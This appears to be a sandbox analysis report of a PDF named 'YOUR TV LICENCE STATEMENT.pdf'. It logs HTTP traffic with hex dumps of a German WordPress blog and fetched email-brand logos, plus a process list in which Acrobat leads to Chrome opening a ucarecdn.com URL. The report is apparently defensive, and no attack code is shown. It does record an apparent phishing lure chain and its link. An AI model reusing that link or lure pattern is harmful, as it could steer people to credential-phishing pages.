                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb2b-71df"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                2025-01-08 06:24:00 UTC227INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:00 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-71df"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.45005935.207.98.74432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:00 UTC539OUTGET / HTTP/1.1
                                                                                                Host: publishing.blog
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:24:01 UTC444INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Wed, 08 Jan 2025 06:24:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                SG-F-Cache: BYPASS
                                                                                                X-Cache-Enabled: True
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Link: <https://publishing.blog/wp-json/>; rel="https://api.w.org/"
                                                                                                X-Httpd-Modphp: 1
                                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                X-Proxy-Cache: HIT
                                                                                                2025-01-08 06:24:01 UTC15940INData Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61
                                                                                                Data Ascii: 8000<!doctype html><html lang="de"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='index, follow, max-image-preview:large, ma


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.45006378.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:01 UTC492OUTGET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb34-a1b9"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                2025-01-08 06:24:01 UTC227INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:01 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-a1b9"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.2.45006278.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:01 UTC503OUTGET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb34-30d5"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                2025-01-08 06:24:01 UTC227INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:01 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-30d5"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                26192.168.2.45006578.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:01 UTC461OUTGET /uploads/gmail-email-logo-png-12.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb2b-71df"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                2025-01-08 06:24:01 UTC227INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:01 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-71df"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.2.45006478.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:01 UTC464OUTGET /uploads/red-email-mail-logo-png-8.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb2b-23834"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                2025-01-08 06:24:01 UTC228INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:01 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-23834"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.2.45006635.207.98.74432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:02 UTC339OUTGET / HTTP/1.1
                                                                                                Host: publishing.blog
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:24:02 UTC444INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Wed, 08 Jan 2025 06:24:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                SG-F-Cache: BYPASS
                                                                                                X-Cache-Enabled: True
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Link: <https://publishing.blog/wp-json/>; rel="https://api.w.org/"
                                                                                                X-Httpd-Modphp: 1
                                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                X-Proxy-Cache: HIT
                                                                                                2025-01-08 06:24:02 UTC15940INData Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61
                                                                                                Data Ascii: 8000<!doctype html><html lang="de"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='index, follow, max-image-preview:large, ma
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d
                                                                                                Data Ascii: preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 76 61 72 20 50 77 70 4a 73 56 61 72 73 20 3d 20 7b 22 41 6a 61 78 55 52 4c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 68 6f 6d 65 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 5c 2f 22 2c 22 69 6e 73 74 61 6c 6c 70 72 6f 6d 70 74 22 3a 7b 22 6d 6f 64 65 22 3a 22 6e 6f 72 6d 61 6c 22 2c 22 70 61 67 65 6c 6f 61 64 73 22 3a 22 32 22 2c 22 6f 6e 63 6c 69 63 6b 22 3a 22 22 7d 2c 22 6d 65 73 73 61 67 65 5f 70 75 73 68 72 65 6d 6f 76 65 5f 66 61 69 6c 65 64 22 3a 22 44 65 76 69 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 6d 6f 76 65 64 2e 22
                                                                                                Data Ascii: /javascript'>var PwpJsVars = {"AjaxURL":"https:\/\/publishing.blog\/wp-admin\/admin-ajax.php","homeurl":"https:\/\/publishing.blog\/","installprompt":{"mode":"normal","pageloads":"2","onclick":""},"message_pushremove_failed":"Device could not be removed."
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 67 67 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 67 67 6c 65 2d 69 74 65 6d 22 3e 3c 64 69 76 20 69 64 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 2d 31 37 37 31 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 22 20 64 61 74 61 2d 74 61 62 3d 22 31 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 2d 31 37 37 31 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 20 3c 61 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 67 67 6c 65 2d 74 69 74 6c 65 22 20 74 61 62 69 6e 64 65 78
                                                                                                Data Ascii: ss="elementor-toggle"><div class="elementor-toggle-item"><div id="elementor-tab-title-1771" class="elementor-tab-title" data-tab="1" role="button" aria-controls="elementor-tab-content-1771" aria-expanded="false"> <a class="elementor-toggle-title" tabindex
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 62 38 39 32 66 35 38 61 34 34 34 62 63 39 65 30 66 22 3e 46 69 67 6d 61 3c 2f 6c 61 62 65 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 66 2d 6c 65 76 65 6c 2d 30 20 73 66 2d 69 74 65 6d 2d 35 35 32 22 20 64 61 74 61 2d 73 66 2d 63 6f 75 6e 74 3d 22 38 39 22 20 64 61 74 61 2d 73 66 2d 64 65 70 74 68 3d 22 30 22 3e 3c 69 6e 70 75 74 20 20 63 6c 61 73 73 3d 22 73 66 2d 69 6e 70 75 74 2d 63 68 65 63 6b 62 6f 78 22 20 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 20 76 61 6c 75 65 3d 22 67 6f 6f 67 6c 65 22 20 6e 61 6d 65 3d 22 5f 73 66 74 5f 70 6f 73 74 5f 74 61 67 5b 5d 22 20 69 64 3d 22 73 66 2d 69 6e 70 75 74 2d 63 37 66 33 61 65 31 61 30 34 36 31 63 35 62 34 32 65 36 39 62 34 37 63 66 31 63 31 66 62 36 31 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73
                                                                                                Data Ascii: b892f58a444bc9e0f">Figma</label></li><li class="sf-level-0 sf-item-552" data-sf-count="89" data-sf-depth="0"><input class="sf-input-checkbox" type="checkbox" value="google" name="_sft_post_tag[]" id="sf-input-c7f3ae1a0461c5b42e69b47cf1c1fb61"><label clas
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 20 69 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 34 31 38 33 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 64 62 33 32 63 62 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 20 73 76 67 7b 2d 2d 65 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 2d 73 69 7a 65 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 34 31 38 33 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 64 62 33 32 63 62 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 2c 20 2e 65 6c 65 6d
                                                                                                Data Ascii: ementor-icon-list-icon i{font-size:0px;}.elementor-41835 .elementor-element.elementor-element-db32cb5 .elementor-icon-list-icon svg{--e-icon-list-icon-size:0px;}.elementor-41835 .elementor-element.elementor-element-db32cb5 .elementor-icon-list-text, .elem
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 2d 69 6e 66 6f 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 70 65 61 74 65 72 2d 69 74 65 6d 2d 66 37 62 64 34 61 37 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 69 6e 66 6f 5f 5f 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 69 6e 66 6f 5f 5f 69 74 65 6d 2d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 22 3e 20 53 69 6d 65 61 20 4d 65 72 6b 69 20 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 70
                                                                                                Data Ascii: -info"><li class="elementor-icon-list-item elementor-repeater-item-f7bd4a7"> <span class="elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-custom"> Simea Merki </span></li><li class="elementor-icon-list-item elementor-rep
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 39 66 35 65 64 63 61 20 65 2d 63 6f 6e 2d 66 75 6c 6c 20 70 6f 73 74 2d 77 72 61 70 70 65 72 2d 64 65 66 61 75 6c 74 2d 70 6f 73 74 20 65 2d 66 6c 65 78 20 65 2d 63 6f 6e 20 65 2d 63 68 69 6c 64 22 20 64 61 74 61 2d 69 64 3d 22 39 66 35 65 64 63 61 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 73 65 74 74 69 6e 67 73 3d 22 7b 26 71 75 6f 74 3b 62 61 63 6b 67 72 6f 75 6e 64 5f 62 61 63 6b 67 72 6f 75 6e 64 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 61 73 73 69 63 26 71 75 6f 74 3b 7d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d
                                                                                                Data Ascii: lass="elementor-element elementor-element-9f5edca e-con-full post-wrapper-default-post e-flex e-con e-child" data-id="9f5edca" data-element_type="container" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-elem
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 31 31 2f 6e 65 77 2d 77 6f 72 6b 2d 73 6d 61 72 74 69 76 65 2d 33 30 30 78 31 36 39 2e 70 6e 67 20 33 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 31 2f 6e 65 77 2d 77 6f 72 6b 2d 73 6d 61 72 74 69 76 65 2d 37 36 38 78 34 33 32 2e 70 6e 67 20 37 36 38 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 31 2f 6e 65 77 2d 77 6f 72 6b 2d 73 6d 61 72 74 69 76 65 2d 32 30 30 78 31 31 33 2e 70 6e 67 20 32 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73
                                                                                                Data Ascii: 11/new-work-smartive-300x169.png 300w, https://publishing.blog/wp-content/uploads/2024/11/new-work-smartive-768x432.png 768w, https://publishing.blog/wp-content/uploads/2024/11/new-work-smartive-200x113.png 200w, https://publishing.blog/wp-content/uploads
                                                                                                2025-01-08 06:24:02 UTC16384INData Raw: 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 66 69 72 65 66 6c 79 2d 6b 75 72 73 2d 73 65 70 74 65 6d 62 65 72 2d 32 30 32 34 2d 33 30 30 78 31 35 30 2e 70 6e 67 20 33 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 66 69 72 65 66 6c 79 2d 6b 75 72 73 2d 73 65 70 74 65 6d 62 65 72 2d 32 30 32 34 2d 37 36 38 78 33 38 34 2e 70 6e 67 20 37 36 38 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 66 69 72 65 66 6c 79 2d 6b 75 72 73 2d 73 65 70 74 65 6d 62 65 72 2d 32 30 32 34 2d 32 30 30 78 31 30 30 2e 70 6e 67 20 32
                                                                                                Data Ascii: ent/uploads/2024/09/firefly-kurs-september-2024-300x150.png 300w, https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-768x384.png 768w, https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-200x100.png 2


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:01:22:20
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\YOUR TV LICENCE STATEMENT.pdf"
                                                                                                Imagebase:0x7ff6bc1b0000
                                                                                                File size:5'641'176 bytes
                                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:01:22:21
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                Imagebase:0x7ff74bb60000
                                                                                                File size:3'581'912 bytes
                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:01:22:21
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1580,i,10633171996407317967,11884511674635725987,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                Imagebase:0x7ff74bb60000
                                                                                                File size:3'581'912 bytes
                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:01:22:45
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/"
                                                                                                Imagebase:0x7ff76e190000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:01:22:46
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
